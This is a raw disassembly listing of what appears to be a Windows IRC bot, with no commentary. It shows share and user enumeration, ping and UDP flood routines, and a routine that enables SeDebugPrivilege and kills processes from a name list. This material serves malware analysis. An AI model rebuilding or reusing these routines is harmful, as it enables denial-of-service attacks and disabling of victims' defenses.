loc_406768: ; CODE XREF: sub_406702+2D�j
; sub_406702+3B�j
push [ebp+arg_8]
push edi
push 0
call sub_405FC7
add esp, 0Ch
loc_406776: ; CODE XREF: sub_406702+27�j
test eax, eax
jnz short loc_406742
loc_40677A: ; CODE XREF: sub_406702+1B�j
push edi
lea eax, [esi+esi*2]
push off_42A3FC[eax*4]
mov esi, offset dword_433D28
push offset aNetSShareS_ ; "[NET]: %s share: '%s'."
push esi
call sub_412BB5
add esp, 10h
jmp short loc_4067BA
; ---------------------------------------------------------------------------
loc_40679A: ; CODE XREF: sub_406702+A�j
mov eax, [ebp+arg_0]
lea eax, [eax+eax*2]
push off_42A3F8[eax*4]
mov esi, offset dword_433D28
push offset aNetSNoShareSpe ; "[NET]: %s: No share specified."
push esi
call sub_412BB5
add esp, 0Ch
loc_4067BA: ; CODE XREF: sub_406702+64�j
; sub_406702+96�j
pop edi
mov eax, esi
pop esi
pop ebp
retn
sub_406702 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4067C0 proc near ; CODE XREF: sub_4078FA+1D03�p
var_214 = byte ptr -214h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 214h
push ebx
push esi
push edi
push [ebp+arg_C]
call sub_405F05
xor esi, esi
push esi
push [ebp+arg_8]
mov [ebp+var_10], eax
push offset aShareNameResou ; "Share name: Resource: "...
push [ebp+arg_4]
mov [ebp+var_4], esi
push [ebp+arg_0]
mov [ebp+var_14], esi
mov [ebp+var_C], esi
call sub_4045DD
add esp, 18h
loc_4067F9: ; CODE XREF: sub_4067C0+10D�j
lea eax, [ebp+var_C]
push eax
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_4]
push eax
push 0FFFFFFFFh
lea eax, [ebp+var_8]
push eax
push 1F6h
push [ebp+var_10]
call dword_4335A0
mov ebx, eax
cmp ebx, esi
jz short loc_40685A
cmp ebx, 0EAh
jz short loc_40685A
push ebx
call sub_40649E
push eax
lea eax, [ebp+var_214]
push offset aNetShareListEr ; "[NET]: Share list error: %s <%ld>"
push eax
call sub_412BB5
push esi
push [ebp+arg_8]
lea eax, [ebp+var_214]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4045DD
add esp, 24h
jmp short loc_4068C7
; ---------------------------------------------------------------------------
loc_40685A: ; CODE XREF: sub_4067C0+5D�j
; sub_4067C0+65�j
xor edi, edi
inc edi
cmp [ebp+var_4], edi
jb short loc_4068BE
mov esi, [ebp+var_8]
add esi, 14h
loc_406868: ; CODE XREF: sub_4067C0+FA�j
push dword ptr [esi+10h]
call dword_433598
test eax, eax
mov eax, offset aYes ; "Yes"
jnz short loc_40687F
mov eax, offset aNo ; "No"
loc_40687F: ; CODE XREF: sub_4067C0+B8�j
push eax
push dword ptr [esi]
lea eax, [ebp+var_214]
push dword ptr [esi+4]
push dword ptr [esi-14h]
push offset a14s24s6u4s ; "%-14S %-24S %-6u %-4s"
push eax
call sub_412BB5
push 1
push [ebp+arg_8]
lea eax, [ebp+var_214]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4045DD
add esp, 2Ch
add esi, 28h
inc edi
cmp edi, [ebp+var_4]
jbe short loc_406868
xor esi, esi
loc_4068BE: ; CODE XREF: sub_4067C0+A0�j
push [ebp+var_8]
call dword_4334D8
loc_4068C7: ; CODE XREF: sub_4067C0+98�j
cmp ebx, 0EAh
jz loc_4067F9
xor eax, eax
cmp ebx, esi
pop edi
pop esi
setz al
pop ebx
leave
retn
sub_4067C0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4068DF proc near ; CODE XREF: sub_4078FA:loc_409672�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
push ebx
mov ebx, [ebp+arg_4]
push esi
push edi
xor edi, edi
cmp ebx, edi
jz loc_406982
mov esi, [ebp+arg_0]
mov eax, esi
sub eax, edi
jz short loc_406921
dec eax
jz short loc_406916
dec eax
jnz short loc_40693C
push [ebp+arg_14]
push [ebp+arg_10]
push [ebp+arg_C]
push ebx
push edi
call sub_4060D0
add esp, 14h
jmp short loc_406938
; ---------------------------------------------------------------------------
loc_406916: ; CODE XREF: sub_4068DF+1D�j
push ebx
push edi
call sub_4060AF
pop ecx
pop ecx
jmp short loc_406938
; ---------------------------------------------------------------------------
loc_406921: ; CODE XREF: sub_4068DF+1A�j
cmp [ebp+arg_8], edi
jz short loc_406935
push [ebp+arg_8]
push ebx
push edi
call sub_406055
add esp, 0Ch
jmp short loc_406938
; ---------------------------------------------------------------------------
loc_406935: ; CODE XREF: sub_4068DF+45�j
push 57h
pop eax
loc_406938: ; CODE XREF: sub_4068DF+35�j
; sub_4068DF+40�j ...
cmp eax, edi
jnz short loc_40695C
loc_40693C: ; CODE XREF: sub_4068DF+20�j
push ebx
lea eax, [esi+esi*2]
push off_42A3FC[eax*4]
mov esi, offset dword_433F28
push offset aNetSUsernameS_ ; "[NET]: %s username: '%s'."
push esi
call sub_412BB5
add esp, 10h
jmp short loc_4069A2
; ---------------------------------------------------------------------------
loc_40695C: ; CODE XREF: sub_4068DF+5B�j
call sub_40649E
push eax
push ebx
lea eax, [esi+esi*2]
push off_42A3F8[eax*4]
mov esi, offset dword_433F28
push offset aNetSErrorWithU ; "[NET]: %s: Error with username: '%s'. %"...
push esi
call sub_412BB5
add esp, 14h
jmp short loc_4069A2
; ---------------------------------------------------------------------------
loc_406982: ; CODE XREF: sub_4068DF+D�j
mov eax, [ebp+arg_0]
lea eax, [eax+eax*2]
push off_42A3F8[eax*4]
mov esi, offset dword_433F28
push offset aNetSNoUsername ; "[NET]: %s: No username specified."
push esi
call sub_412BB5
add esp, 0Ch
loc_4069A2: ; CODE XREF: sub_4068DF+7B�j
; sub_4068DF+A1�j
pop edi
mov eax, esi
pop esi
pop ebx
pop ebp
retn
sub_4068DF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4069A9 proc near ; CODE XREF: sub_4078FA+1DA5�p
var_21C = byte ptr -21Ch
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 21Ch
push esi
push edi
push [ebp+arg_C]
xor esi, esi
mov [ebp+var_4], esi
call sub_405F05
push esi
push [ebp+arg_8]
mov [ebp+var_18], eax
push offset aUsernameAccoun ; "Username accounts for local system:"
push [ebp+arg_4]
mov [ebp+var_8], esi
push [ebp+arg_0]
mov [ebp+var_14], esi
mov [ebp+var_1C], esi
mov [ebp+var_C], esi
call sub_4045DD
add esp, 18h
push ebx
loc_4069E8: ; CODE XREF: sub_4069A9+129�j
lea eax, [ebp+var_1C]
push eax
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_8]
push eax
push 0FFFFFFFFh
lea eax, [ebp+var_4]
push eax
push 2
push esi
push [ebp+var_18]
call dword_433480
cmp eax, esi
mov [ebp+var_10], eax
jz short loc_406A47
cmp eax, 0EAh
jz short loc_406A47
push eax
call sub_40649E
push eax
lea eax, [ebp+var_21C]
push offset aNetUserListErr ; "[NET]: User list error: %s <%ld>"
push eax
call sub_412BB5
push esi
push [ebp+arg_8]
lea eax, [ebp+var_21C]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4045DD
add esp, 24h
jmp short loc_406AB8
; ---------------------------------------------------------------------------
loc_406A47: ; CODE XREF: sub_4069A9+62�j
; sub_4069A9+69�j
mov edi, [ebp+var_4]
cmp edi, esi
jz short loc_406ACB
xor ebx, ebx
cmp [ebp+var_8], esi
jbe short loc_406AB8
loc_406A55: ; CODE XREF: sub_4069A9+E7�j
cmp edi, esi
lea eax, [ebp+var_21C]
jz short loc_406A94
push dword ptr [edi]
push offset aS_2 ; " %S"
push eax
call sub_412BB5
push 1
push [ebp+arg_8]
lea eax, [ebp+var_21C]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4045DD
add esp, 20h
add edi, 4
inc [ebp+var_C]
inc ebx
cmp ebx, [ebp+var_8]
jb short loc_406A55
jmp short loc_406AB8
; ---------------------------------------------------------------------------
loc_406A94: ; CODE XREF: sub_4069A9+B4�j
push offset aNetAnAccessVio ; "[NET]: An access violation has occured."...
push eax
call sub_412BB5
push esi
push [ebp+arg_8]
lea eax, [ebp+var_21C]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4045DD
add esp, 1Ch
loc_406AB8: ; CODE XREF: sub_4069A9+9C�j
; sub_4069A9+AA�j ...
mov edi, [ebp+var_4]
cmp edi, esi
jz short loc_406ACB
push edi
call dword_4334D8
xor edi, edi
mov [ebp+var_4], edi
loc_406ACB: ; CODE XREF: sub_4069A9+A3�j
; sub_4069A9+114�j
cmp [ebp+var_10], 0EAh
jz loc_4069E8
cmp edi, esi
pop ebx
jz short loc_406AE4
push edi
call dword_4334D8
loc_406AE4: ; CODE XREF: sub_4069A9+132�j
push [ebp+var_C]
lea eax, [ebp+var_21C]
push offset aTotalUsersFoun ; "Total users found: %d."
push eax
call sub_412BB5
push esi
push [ebp+arg_8]
lea eax, [ebp+var_21C]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4045DD
add esp, 20h
xor eax, eax
cmp [ebp+var_10], esi
pop edi
setz al
pop esi
leave
retn
sub_4069A9 endp
; =============== S U B R O U T I N E =======================================
sub_406B1D proc near ; CODE XREF: sub_4028A8+7D�p
; sub_4038B7+4A�p ...
arg_0 = dword ptr 4
push [esp+arg_0]
call dword_433514
cmp eax, 0FFFFFFFFh
jnz short locret_406B45
push [esp+arg_0]
call dword_433500
test eax, eax
jnz short loc_406B3E
or eax, 0FFFFFFFFh
retn
; ---------------------------------------------------------------------------
loc_406B3E: ; CODE XREF: sub_406B1D+1B�j
mov eax, [eax+0Ch]
mov eax, [eax]
mov eax, [eax]
locret_406B45: ; CODE XREF: sub_406B1D+D�j
retn
sub_406B1D endp
; =============== S U B R O U T I N E =======================================
sub_406B46 proc near ; CODE XREF: sub_40779B+138�p
mov ecx, dword_433584
xor eax, eax
test ecx, ecx
jz short locret_406B54
jmp ecx
; ---------------------------------------------------------------------------
locret_406B54: ; CODE XREF: sub_406B46+A�j
retn
sub_406B46 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=78h
sub_406B55 proc near ; CODE XREF: sub_4078FA:loc_40BA88�p
var_88 = byte ptr -88h
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
lea ebp, [esp-78h]
sub esp, 88h
push ebx
push esi
xor eax, eax
push edi
inc eax
push eax
mov [ebp+78h+var_4], eax
lea eax, [ebp+78h+var_8]
xor ebx, ebx
push eax
push ebx
xor esi, esi
mov [ebp+78h+var_8], ebx
call dword_4334AC
mov ecx, eax
sub ecx, ebx
jz short loc_406BE5
sub ecx, 32h
jz loc_406C2C
sub ecx, 48h
jz short loc_406BB0
sub ecx, 6Eh
jz short loc_406BA9
loc_406B95: ; CODE XREF: sub_406B55+8E�j
push eax
lea eax, [ebp+78h+var_88]
push offset aFlushdnsErrorG ; "[FLUSHDNS]: Error getting ARP cache: <%"...
push eax
call sub_412BB5
add esp, 0Ch
jmp short loc_406C0D
; ---------------------------------------------------------------------------
loc_406BA9: ; CODE XREF: sub_406B55+3E�j
push offset aFlushdnsArpCac ; "[FLUSHDNS]: ARP cache is empty."
jmp short loc_406C02
; ---------------------------------------------------------------------------
loc_406BB0: ; CODE XREF: sub_406B55+39�j
push [ebp+78h+var_8]
call sub_41344D
pop ecx
mov ecx, [ebp+78h+var_8]
mov edx, ecx
mov esi, eax
shr ecx, 2
xor eax, eax
mov edi, esi
rep stosd
mov ecx, edx
and ecx, 3
cmp esi, ebx
rep stosb
jz short loc_406BFD
push 1
lea eax, [ebp+78h+var_8]
push eax
push esi
call dword_4334AC
cmp eax, ebx
jnz short loc_406B95
loc_406BE5: ; CODE XREF: sub_406B55+2B�j
cmp [esi], ebx
jbe short loc_406C1A
lea edi, [esi+4]
loc_406BEC: ; CODE XREF: sub_406B55+A4�j
push edi
call dword_43350C
inc ebx
add edi, 18h
cmp ebx, [esi]
jb short loc_406BEC
jmp short loc_406C1A
; ---------------------------------------------------------------------------
loc_406BFD: ; CODE XREF: sub_406B55+7D�j
push offset aFlushdnsUnable ; "[FLUSHDNS]: Unable to allocation ARP ca"...
loc_406C02: ; CODE XREF: sub_406B55+59�j
; sub_406B55+DC�j
lea eax, [ebp+78h+var_88]
push eax
call sub_412BB5
pop ecx
pop ecx
loc_406C0D: ; CODE XREF: sub_406B55+52�j
lea eax, [ebp+78h+var_88]
push eax
mov [ebp+78h+var_4], ebx
call sub_401C33
pop ecx
loc_406C1A: ; CODE XREF: sub_406B55+92�j
; sub_406B55+A6�j
push esi
call sub_412FE4
mov eax, [ebp+78h+var_4]
pop ecx
pop edi
pop esi
pop ebx
add ebp, 78h
leave
retn
; ---------------------------------------------------------------------------
loc_406C2C: ; CODE XREF: sub_406B55+30�j
push offset aFlushdnsNotSup ; "[FLUSHDNS]: Not supported by this syste"...
jmp short loc_406C02
sub_406B55 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406C33 proc near ; CODE XREF: sub_401141+21B�p
; sub_401141+32A�p ...
var_14 = byte ptr -14h
var_10 = byte ptr -10h
var_F = byte ptr -0Fh
var_E = byte ptr -0Eh
var_D = byte ptr -0Dh
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 14h
push esi
push edi
xor eax, eax
lea edi, [ebp+var_14]
stosd
stosd
stosd
stosd
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_14]
push eax
push [ebp+arg_0]
mov [ebp+var_4], 10h
call dword_433418
movzx eax, [ebp+var_D]
push eax
movzx eax, [ebp+var_E]
push eax
movzx eax, [ebp+var_F]
push eax
movzx eax, [ebp+var_10]
push eax
push offset aD_D_D_D ; "%d.%d.%d.%d"
mov esi, offset dword_434128
push esi
call sub_412BB5
add esp, 18h
pop edi
mov eax, esi
pop esi
leave
retn
sub_406C33 endp
; =============== S U B R O U T I N E =======================================
sub_406C89 proc near ; CODE XREF: sub_41046C+437�p
; sub_41046C+48D�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov ecx, [esp+arg_4]
xor edx, edx
cmp ecx, 1
push esi
jle short loc_406CB4
lea eax, [ecx-2]
shr eax, 1
inc eax
mov esi, eax
neg esi
lea ecx, [ecx+esi*2]
mov esi, [esp+4+arg_0]
push edi
loc_406CA7: ; CODE XREF: sub_406C89+26�j
movzx edi, word ptr [esi]
add edx, edi
inc esi
inc esi
dec eax
jnz short loc_406CA7
pop edi
jmp short loc_406CB8
; ---------------------------------------------------------------------------
loc_406CB4: ; CODE XREF: sub_406C89+A�j
mov esi, [esp+4+arg_0]
loc_406CB8: ; CODE XREF: sub_406C89+29�j
test ecx, ecx
jz short loc_406CC1
movzx eax, byte ptr [esi]
add edx, eax
loc_406CC1: ; CODE XREF: sub_406C89+31�j
mov ecx, edx
shr ecx, 10h
and edx, 0FFFFh
add ecx, edx
mov eax, ecx
shr eax, 10h
add eax, ecx
not eax
pop esi
retn
sub_406C89 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406CD9 proc near ; DATA XREF: sub_4078FA+50A8�o
var_10320 = byte ptr -10320h
var_344 = byte ptr -344h
var_144 = dword ptr -144h
var_140 = byte ptr -140h
var_C0 = byte ptr -0C0h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_20 = byte ptr -20h
var_18 = dword ptr -18h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 10320h
call sub_412DD0
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 49h
pop ecx
mov esi, eax
xor ebx, ebx
lea edi, [ebp+var_144]
rep movsd
inc ebx
mov [eax+120h], ebx
call dword_4334F0
mov [ebp+arg_0], eax
lea eax, [ebp+var_C0]
push eax
call dword_433514
mov esi, eax
xor eax, eax
cmp esi, 0FFFFFFFFh
jnz short loc_406D32
lea eax, [ebp+var_C0]
push eax
call dword_433500
test eax, eax
jz short loc_406D38
loc_406D32: ; CODE XREF: sub_406CD9+46�j
cmp [ebp+arg_0], 0FFFFFFFFh
jnz short loc_406D96
loc_406D38: ; CODE XREF: sub_406CD9+57�j
lea eax, [ebp+var_C0]
push eax
lea eax, [ebp+var_344]
push offset aPingErrorSendi ; "[PING]: Error sending pings to %s."
push eax
call sub_412BB5
add esp, 0Ch
cmp [ebp+var_28], 0
jnz short loc_406D7A
push 0
push [ebp+var_2C]
lea eax, [ebp+var_344]
push eax
lea eax, [ebp+var_140]
push eax
push [ebp+var_144]
call sub_4045DD
add esp, 14h
loc_406D7A: ; CODE XREF: sub_406CD9+7E�j
lea eax, [ebp+var_344]
push eax
call sub_401C33
push [ebp+var_30]
call sub_4111AE
pop ecx
pop ecx
push ebx
jmp loc_406E5B
; ---------------------------------------------------------------------------
loc_406D96: ; CODE XREF: sub_406CD9+5D�j
test eax, eax
jz short loc_406DA6
mov eax, [eax+0Ch]
mov eax, [eax]
mov eax, [eax]
mov [ebp+var_4], eax
jmp short loc_406DA9
; ---------------------------------------------------------------------------
loc_406DA6: ; CODE XREF: sub_406CD9+BF�j
mov [ebp+var_4], esi
loc_406DA9: ; CODE XREF: sub_406CD9+CB�j
push 7
xor eax, eax
pop ecx
lea edi, [ebp+var_20]
rep stosd
or [ebp+var_18], 0FFFFFFFFh
mov eax, 0FFDCh
cmp [ebp+var_3C], eax
jle short loc_406DC4
mov [ebp+var_3C], eax
loc_406DC4: ; CODE XREF: sub_406CD9+E6�j
cmp [ebp+var_38], ebx
jge short loc_406DCC
mov [ebp+var_38], ebx
loc_406DCC: ; CODE XREF: sub_406CD9+EE�j
xor edi, edi
xor esi, esi
cmp [ebp+var_40], edi
jle short loc_406DFB
loc_406DD5: ; CODE XREF: sub_406CD9+120�j
push [ebp+var_38]
lea eax, [ebp+var_20]
push 1Ch
push eax
push edi
push [ebp+var_3C]
lea eax, [ebp+var_10320]
push eax
push [ebp+var_4]
push [ebp+arg_0]
call dword_433588
inc esi
cmp esi, [ebp+var_40]
jl short loc_406DD5
loc_406DFB: ; CODE XREF: sub_406CD9+FA�j
push [ebp+arg_0]
call dword_433524
lea eax, [ebp+var_C0]
push eax
lea eax, [ebp+var_344]
push offset aPingFinishedSe ; "[PING]: Finished sending pings to %s."
push eax
call sub_412BB5
add esp, 0Ch
cmp [ebp+var_28], edi
jnz short loc_406E44
push edi
push [ebp+var_2C]
lea eax, [ebp+var_344]
push eax
lea eax, [ebp+var_140]
push eax
push [ebp+var_144]
call sub_4045DD
add esp, 14h
loc_406E44: ; CODE XREF: sub_406CD9+149�j
lea eax, [ebp+var_344]
push eax
call sub_401C33
push [ebp+var_30]
call sub_4111AE
pop ecx
pop ecx
push edi
loc_406E5B: ; CODE XREF: sub_406CD9+B8�j
call ds:dword_41F014
int 3 ; Trap to Debugger
sub_406CD9 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406E62 proc near ; DATA XREF: sub_4078FA+5201�o
var_10316 = byte ptr -10316h
var_10314 = byte ptr -10314h
var_338 = byte ptr -338h
var_138 = dword ptr -138h
var_134 = byte ptr -134h
var_B4 = byte ptr -0B4h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_14 = word ptr -14h
var_12 = word ptr -12h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 10314h
call sub_412DD0
mov eax, [ebp+arg_0]
push esi
push edi
push 49h
pop ecx
mov esi, eax
lea edi, [ebp+var_138]
rep movsd
xor esi, esi
inc esi
mov [eax+120h], esi
call ds:dword_41F004
push eax
call sub_412D64
pop ecx
push 11h
push 2
push 2
call dword_4334A0
mov [ebp+var_4], eax
xor eax, eax
lea edi, [ebp+var_14]
stosd
stosd
stosd
stosd
lea eax, [ebp+var_B4]
push eax
mov [ebp+var_14], 2
call dword_433514
xor edi, edi
xor ecx, ecx
cmp eax, 0FFFFFFFFh
mov [ebp+arg_0], eax
jnz short loc_406F3D
lea eax, [ebp+var_B4]
push eax
call dword_433500
mov ecx, eax
cmp ecx, edi
jnz short loc_406F3D
lea eax, [ebp+var_B4]
push eax
lea eax, [ebp+var_338]
push offset aUdpErrorSendin ; "[UDP]: Error sending pings to %s."
push eax
call sub_412BB5
add esp, 0Ch
cmp [ebp+var_1C], edi
jnz short loc_406F21
push edi
push [ebp+var_20]
lea eax, [ebp+var_338]
push eax
lea eax, [ebp+var_134]
push eax
push [ebp+var_138]
call sub_4045DD
add esp, 14h
loc_406F21: ; CODE XREF: sub_406E62+9D�j
lea eax, [ebp+var_338]
push eax
call sub_401C33
push [ebp+var_24]
call sub_4111AE
pop ecx
pop ecx
push esi
jmp loc_407076
; ---------------------------------------------------------------------------
loc_406F3D: ; CODE XREF: sub_406E62+6A�j
; sub_406E62+7D�j
cmp [ebp+var_28], edi
jge short loc_406F45
mov [ebp+var_28], edi
loc_406F45: ; CODE XREF: sub_406E62+DE�j
mov eax, 0FFFFh
cmp [ebp+var_28], eax
jle short loc_406F52
mov [ebp+var_28], eax
loc_406F52: ; CODE XREF: sub_406E62+EB�j
cmp ecx, edi
jz short loc_406F5D
mov eax, [ecx+0Ch]
mov eax, [eax]
jmp short loc_406F60
; ---------------------------------------------------------------------------
loc_406F5D: ; CODE XREF: sub_406E62+F2�j
lea eax, [ebp+arg_0]
loc_406F60: ; CODE XREF: sub_406E62+F9�j
cmp [ebp+var_28], edi
mov eax, [eax]
mov [ebp+var_10], eax
jnz short loc_406F7B
call sub_412D71
cdq
mov ecx, 0FFDCh
idiv ecx
inc edx
push edx
jmp short loc_406F7E
; ---------------------------------------------------------------------------
loc_406F7B: ; CODE XREF: sub_406E62+106�j
push [ebp+var_28]
loc_406F7E: ; CODE XREF: sub_406E62+117�j
call dword_4335EC
mov [ebp+var_12], ax
mov eax, [ebp+var_34]
push 0Ah
cdq
pop ecx
idiv ecx
cmp [ebp+var_2C], edi
mov [ebp+var_34], eax
jnz short loc_406F9C
mov [ebp+var_2C], esi
loc_406F9C: ; CODE XREF: sub_406E62+135�j
xor esi, esi
cmp [ebp+var_30], edi
jle short loc_407017
loc_406FA3: ; CODE XREF: sub_406E62+159�j
call sub_412D71
cdq
mov ecx, 0FFh
idiv ecx
inc esi
cmp esi, [ebp+var_30]
mov [ebp+esi-10315h], dl
jl short loc_406FA3
jmp short loc_407017
; ---------------------------------------------------------------------------
loc_406FBF: ; CODE XREF: sub_406E62+1B8�j
dec [ebp+var_34]
push 0Bh
pop esi
loc_406FC5: ; CODE XREF: sub_406E62+195�j
push 10h
lea eax, [ebp+var_14]
push eax
push edi
call sub_412D71
push 0Ah
cdq
pop ecx
idiv ecx
mov eax, [ebp+var_30]
sub eax, edx
push eax
lea eax, [ebp+var_10314]
push eax
push [ebp+var_4]
call dword_433470
push [ebp+var_2C]
call ds:dword_41F000
dec esi
jnz short loc_406FC5
cmp [ebp+var_28], edi
jnz short loc_407017
call sub_412D71
cdq
mov ecx, 0FFDCh
idiv ecx
inc edx
push edx
call dword_4335EC
mov [ebp+var_12], ax
loc_407017: ; CODE XREF: sub_406E62+13F�j
; sub_406E62+15B�j ...
cmp [ebp+var_34], edi
jg short loc_406FBF
dec [ebp+var_34]
lea eax, [ebp+var_B4]
push eax
lea eax, [ebp+var_338]
push offset aUdpFinishedSen ; "[UDP]: Finished sending packets to %s."
push eax
call sub_412BB5
add esp, 0Ch
cmp [ebp+var_1C], edi
jnz short loc_40705F
push edi
push [ebp+var_20]
lea eax, [ebp+var_338]
push eax
lea eax, [ebp+var_134]
push eax
push [ebp+var_138]
call sub_4045DD
add esp, 14h
loc_40705F: ; CODE XREF: sub_406E62+1DB�j
lea eax, [ebp+var_338]
push eax
call sub_401C33
push [ebp+var_24]
call sub_4111AE
pop ecx
pop ecx
push edi
loc_407076: ; CODE XREF: sub_406E62+D6�j
call ds:dword_41F014
loc_40707C: ; DATA XREF: .data:0042BBE4�o
; .data:0042BBF8�o ...
int 3 ; Trap to Debugger
sub_406E62 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40707D proc near ; CODE XREF: sub_4058F3+7�p
; sub_4070E8+5F�p ...
var_14 = dword ptr -14h
var_10 = byte ptr -10h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 14h
lea eax, [ebp+var_4]
push eax
push 28h
call ds:dword_41F0B4
push eax
call dword_4335D4
test eax, eax
jnz short loc_40709C
leave
retn
; ---------------------------------------------------------------------------
loc_40709C: ; CODE XREF: sub_40707D+1B�j
push esi
lea eax, [ebp+var_10]
push eax
push [ebp+arg_0]
xor esi, esi
push esi
call dword_4335BC
test eax, eax
jz short loc_4070DA
cmp [ebp+arg_4], esi
mov [ebp+var_14], 1
jz short loc_4070C3
or [ebp+var_8], 2
jmp short loc_4070C7
; ---------------------------------------------------------------------------
loc_4070C3: ; CODE XREF: sub_40707D+3E�j
and [ebp+var_8], 0FFFFFFFDh
loc_4070C7: ; CODE XREF: sub_40707D+44�j
push esi
push esi
push esi
lea eax, [ebp+var_14]
push eax
push esi
push [ebp+var_4]
call dword_433508
mov esi, eax
loc_4070DA: ; CODE XREF: sub_40707D+32�j
push [ebp+var_4]
call ds:dword_41F034
mov eax, esi
pop esi
leave
retn
sub_40707D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4070E8 proc near ; CODE XREF: sub_4073FB+68�p
; sub_4074FD+C�p ...
var_550 = byte ptr -550h
var_350 = dword ptr -350h
var_34C = byte ptr -34Ch
var_230 = byte ptr -230h
var_12C = dword ptr -12Ch
var_128 = byte ptr -128h
var_124 = dword ptr -124h
var_108 = byte ptr -108h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
push ebp
mov ebp, esp
sub esp, 550h
push ebx
push esi
push edi
xor ebx, ebx
push 49h
xor eax, eax
cmp dword_433490, ebx
pop ecx
lea edi, [ebp+var_128]
mov [ebp+var_12C], ebx
rep stosd
mov ecx, 88h
lea edi, [ebp+var_34C]
mov [ebp+var_350], ebx
rep stosd
jz loc_4072F9
cmp dword_4334EC, ebx
jz loc_4072F9
cmp dword_433450, ebx
jz loc_4072F9
push 1
push offset aSedebugprivile ; "SeDebugPrivilege"
call sub_40707D
pop ecx
pop ecx
push ebx
push 0Fh
call dword_433490
mov edi, eax
cmp edi, 0FFFFFFFFh
mov [ebp+var_4], edi
jz loc_4072EC
lea eax, [ebp+var_12C]
push eax
push edi
mov [ebp+var_12C], 128h
call dword_4334EC
test eax, eax
mov esi, ds:dword_41F034
jz loc_4072E7
lea eax, [ebp+var_12C]
push eax
push edi
call dword_433450
test eax, eax
jz loc_4072E7
mov ebx, ds:dword_41F0C4
loc_4071A7: ; CODE XREF: sub_4070E8+1F7�j
cmp [ebp+arg_10], 0
jz short loc_407208
xor edi, edi
loc_4071AF: ; CODE XREF: sub_4070E8+E7�j
push off_42A458[edi]
lea eax, [ebp+var_108]
push eax
call ds:dword_41F0C0
test eax, eax
jz short loc_4071D6
add edi, 4
cmp edi, 9E0h
jb short loc_4071AF
jmp loc_4072CD
; ---------------------------------------------------------------------------
loc_4071D6: ; CODE XREF: sub_4070E8+DC�j
push [ebp+var_124]
push 0
push 1F0FFFh
call ebx
mov edi, eax
test edi, edi
jz loc_4072CD
push 0
push edi
call ds:dword_41F0BC
test eax, eax
jnz loc_4072CD
loc_407200: ; CODE XREF: sub_4070E8+1AF�j
push edi
call esi
jmp loc_4072CD
; ---------------------------------------------------------------------------
loc_407208: ; CODE XREF: sub_4070E8+C3�j
mov edi, [ebp+arg_C]
test edi, edi
jnz loc_40729C
cmp [ebp+arg_4], edi
jz loc_4072CD
push [ebp+var_124]
push 8
call dword_433490
cmp [ebp+arg_14], 0
mov edi, eax
mov [ebp+var_350], 224h
jz short loc_40725C
lea eax, [ebp+var_350]
push eax
push edi
call dword_4334B8
test eax, eax
push [ebp+var_124]
jz short loc_407262
lea eax, [ebp+var_230]
jmp short loc_407268
; ---------------------------------------------------------------------------
loc_40725C: ; CODE XREF: sub_4070E8+152�j
push [ebp+var_124]
loc_407262: ; CODE XREF: sub_4070E8+16A�j
lea eax, [ebp+var_108]
loc_407268: ; CODE XREF: sub_4070E8+172�j
push eax
lea eax, [ebp+var_550]
push offset aSD_0 ; " %s (%d)"
push eax
call sub_412BB5
add esp, 10h
push 1
push [ebp+arg_8]
lea eax, [ebp+var_550]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4045DD
add esp, 14h
